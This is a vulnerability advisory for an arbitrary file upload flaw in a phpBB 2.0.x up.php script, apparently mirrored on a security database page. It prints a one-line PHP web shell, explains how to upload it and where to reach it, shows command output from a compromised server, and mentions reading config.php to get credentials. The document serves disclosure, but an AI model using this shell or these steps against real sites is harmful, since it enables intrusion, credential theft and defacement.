Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline

phpBBupload.txt

🗓️ 17 Apr 2005 00:00:00Reported by Status-xType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 26 Views

Advisory for "phpBB up.php Arbitrary File Upload" vulnerability in phpBB 2.0.x forums syste

Show more
Code
`#####################################################################  
  
Advisory #1 "phpBB Upload Script "up.php" Arbitrary File Upload"  
  
$ Author: Status-x  
$ Contact: [email protected] - [email protected]  
$ Date: 7 April 2005  
$ Website: http://defacers.com.mx  
$ Original Advisory: http://www.defacers.com.mx/advisories/2.txt  
$ Risk: High  
$ Vendor URL: http://phpbb.com  
  
$ Affected Software: phpBB 2.0.x  
  
Note: Sorry if it has been posted before  
  
#####################################################################  
  
-= Description =-  
  
phpBB its a forums system written in php which can support images, polls,  
  
private messages and more  
  
http://www.phpbb.com  
  
---------------------------------------------------------------------------  
  
-= Vulnerabilities =-  
  
  
- | "Arbitrary File Upload" |  
  
  
In phpBB forums there is an script which can allow to remote and registered  
  
users to upload files with arbitrary content and with any extension.  
  
I didnt found any website where i can download the script so i couldnt  
  
check who made it.  
  
  
  
- | Examples: |  
  
  
We can create and example code to upload it to the "test site"  
  
  
<?  
  
system($cmd)  
  
?>  
  
  
And save it as cmd.php. The we enter to:  
  
--------------------------  
  
http://target/phpbb/up.php  
  
--------------------------  
  
  
And upload our code, to see our file we just enter to:  
  
-----------------------------------  
  
http://targey/phpbb/uploads/cmd.php  
  
-----------------------------------  
  
  
And we could see that our file has been uploaded:  
  
  
  
Warning: system(): Cannot execute a blank command in   
/home/target/public_html/forum/uploads/tetx.php on line 2  
  
  
The we can execute *NIX commands to obtain extremely compromising info  
  
that could end with the "deface" of the affected site:  
  
-----------------------------------------------------  
  
Linux SERVER 2.4.21-4.0.1.ELsmp #1 SMP  
Thu Oct 23 01:27:36 EDT 2003 i686 i686 i386 GNU/Linux  
/home/target/public_html/forum/uploads  
uid=32029(target) gid=530(target) groups=530(target)   
  
------------------------------------------------------  
  
This is just an example to what can be done by a malicious attacker.  
  
  
- | "Password Disclosure" |  
  
  
The remote or local attacker can also read the config.php file disclosing  
  
the information about the DB and possible the FTP password  
  
  
------------------------------------------------------  
  
Example  
  
-= How to FIX =-  
  
Just filter the allowed extensions of the uploaded files in the up.php  
  
source.  
  
  
-= Contact =-  
  
Status-x   
  
[email protected]  
  
http://www.defacers.com.mx  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
17 Apr 2005 00:00Current
7.4High risk
Vulners AI Score7.4
arbitrary file uploadphpbb 2.0.xremote usersregistered usersexamplespassword disclosurefixcontacthigh riskvendor urloriginal advisorydefacers.com.mxstatus-xemail addresswebsite
26
.json
Report